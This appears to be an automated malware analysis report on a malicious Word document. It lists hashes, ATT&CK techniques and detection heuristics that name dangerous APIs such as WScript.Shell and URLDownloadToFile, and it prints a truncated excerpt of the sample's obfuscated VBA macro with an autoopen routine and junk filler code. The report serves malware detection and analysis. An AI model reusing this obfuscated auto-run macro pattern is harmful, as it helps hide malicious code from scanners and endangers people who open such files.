Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e899cbbb3884eb17…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 157.2 KB
Created: 2019-04-17 07:57:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 7fb997d5c0948a9b948e93d0db552735
SHA-1: 1ec420ba7f7b78d64048e6bb61af019ebbfa7bcf
SHA-256: e899cbbb3884eb173bd8f11b60d2b87ea66a7449efc61cfe9e717a1af70fa5f4
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an autoopen subroutine, indicating it is designed to execute automatically when the document is opened. Critical heuristics indicate obfuscation techniques and the use of the GetObject API to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process', which is a strong indicator of malicious intent.

Heuristics (8)

  • ClamAV: Doc.Malware.00536d-6944243-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6944243-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28486 bytes
SHA-256: 90ed0448eb1d2a8b6f8c459e8550d1f131ca634a04f929ea7891849ffc2417e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kDAQAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jAAwCAA"
Attribute VB_Base = "0{F1DEB5AA-AA7A-4F5D-B93D-2FD8EF38F997}{E431C063-FB9F-4623-8290-C3369EDB84FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "oDXABDDo"
Attribute VB_Base = "0{C870EB7E-95B3-45A3-A9C4-E9FAE6C4621D}{9F4924FF-48FB-438B-AE43-90F0ACF72393}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q1AC_X"
Sub autoopen()
   If nxGkAcC = dkAADQU Then
    jADx1A4 = 253082994 * foAQA4wQ
  ElseIf u4QCoGA = NAXCxZ Then
    Set mUZQAk = hABD_o
  ElseIf D4kwAAAc = foAAAA Then
   YAAxA_U = tB1QDA / VUAABDZB * NGUAQAA + Sqr(iAoAAB)
  ElseIf VGAwckAA = tAUA_4C Then
   bAAxBC = 712427310
End If
   If NDAAAU = Wxxk_A Then
    MADAAQc = 821092024 * rXQ4AxZ
  ElseIf oADcccA = rQUXXABw Then
    Set JAkAxABQ = KcA_DXAA
  ElseIf DUX1cA = AoA4o4Q Then
   mAAUA4Z = vCBcAUCA / cA_oACQ * fkxUQQBk + Sqr(hkUBAwXQ)
  ElseIf hAAAAAB = j_AQUo Then
   M1AA1CDA = 360151527
End If
   If sco1ZG = oAoBAoA Then
    KAABUDx = 700594498 * sAAk1XA
  ElseIf EwGAQxAA = XkAkBD Then
    Set K_Ao4A = HAkBDZ
  ElseIf NwZ1AABA = jACwXAD Then
   ECwAAUZo = zUCAxoA / QUoZUCAo * cDZ1QwcA + Sqr(u1CZCZ)
  ElseIf aADBokQA = qGAQUCQ Then
   VXBxAA4 = 53062229
End If
jADDA1DA
   If zAAABU = qAwD_1A1 Then
    CAx1Qw = 125446710 * zZAAZw4
  ElseIf EcXXBwBA = HAAUAAA Then
    Set jAQCkQ = iUAooB
  ElseIf wcowQ_ = i1XBAAAw Then
   mCBADUG = BQGABc / wD41wxBD * fQUoZ_D + Sqr(joA_BB1)
  ElseIf vA4411oB = bCUUAA Then
   pA1wo__ = 894511143
End If
   If uZAAAx_X = cXB1AZwG Then
    Io4ADDC = 399256549 * jUAXAkG
  ElseIf TA_BAwUc = P_AACBxA Then
    Set vDDGoA = TAAAZUXU
  ElseIf XQcUAB = NZZ4xwQG Then
   wQCkDA = k_cUUQ / XUDQAQ_C * MQwAABA + Sqr(wAAAAA4)
  ElseIf wQACAxQD = uA1c1_A Then
   oUkDAkCC = 111865309
End If
End Sub

Attribute VB_Name = "B_Ccc_Qc"
Function jADDA1DA()
On Error Resume Next
   If zAB4AAQ = MwBkkB Then
    uXAAAD = 866597989 * zxA4A_D
  ElseIf CCAcc1D = VCX4AUU Then
    Set CBAXUQA = D_AQwkQZ
  ElseIf vwBGBG_k = JwoBD1A Then
   NAQkZxCw = DBADA1AX / ZwUAZ4BB * vcAAAcUD + Sqr(u_BUwZo)
  ElseIf cCkCAUxU = vXDAAAD Then
   PAAABQcx = 392269431
End If
   If uBoAUoUx = wXB_1Q Then
    GUwXUAZU = 239655598 * rDZAcA
  ElseIf wAGDoABc = DUGUUAA Then
    Set XBGcA4oA = UBACcQA
  ElseIf SBQAD1 = XAcoBD Then
   N1CAAcBA = cQAU4DXw / uw1U_QA1 * rZoDU_k + Sqr(SAZA4A)
  ElseIf nBAGDD = BxABXBAA Then
   CAGcAwQA = 904319934
End If
If 9433 < 99032 Then
qUAcAB = vbFalse
   If vGo1AA4B = GQBAcDDA Then
    wZ4DBDo = 851439880 * tA1AccBA
  ElseIf DcXAGZA = X4AxBoU Then
    Set WcDA4AA1 = rxAAA_Q
  ElseIf kAADAw = GAABBA Then
   kDADAcD = oAX_ZQxA / RDoDQAA * nBADXGQ + Sqr(jAUDAw)
  ElseIf fB4AUGZ = TAcQBxXo Then
   bQcQCA = 799267966
End If
   If VCBQAAQA = oAA_BUD Then
    zAAACA = 64022806 * zAQ_4A
  ElseIf OAAQZD = H4kA_G Then
    Set SAA4ZA = z4ACA1
  ElseIf IDk1AGZ_ = pAAUUAk Then
   HZGUUA = tAA_Bo1 / bABUC_ * FBAAAU + Sqr(K4AZGA)
  ElseIf E4kwACAA = pwAAXx4 Then
   E1Ac4Z = 434060514
End If
   If V4AoB4G = KBBwwAA Then
    DQQ1GUA = 836311093 * uAC4_G
  ElseIf zAA_4Q = SAXoAx Then
    Set nAAkAABU = AwACDBA
  ElseIf bk4CAAQ = hUAoZDB Then
   jwBUUkwQ = VDA_xBAA / ZGDDCDAA * IDQ4AUoA + Sqr(lAAACAx)
  ElseIf OADUk_x = mAwZUoA Then
   BA4UAAGc = 758232136
End If
End If
   If AAAxGAwA = JXwAXA1 Then
    iAQwBxQ = 97893313 * JXQADZA
  ElseIf uAwXG4 = vADDAA Then
    Set cwUZxkQZ = WABkCU_w
  ElseIf Wc
... (truncated)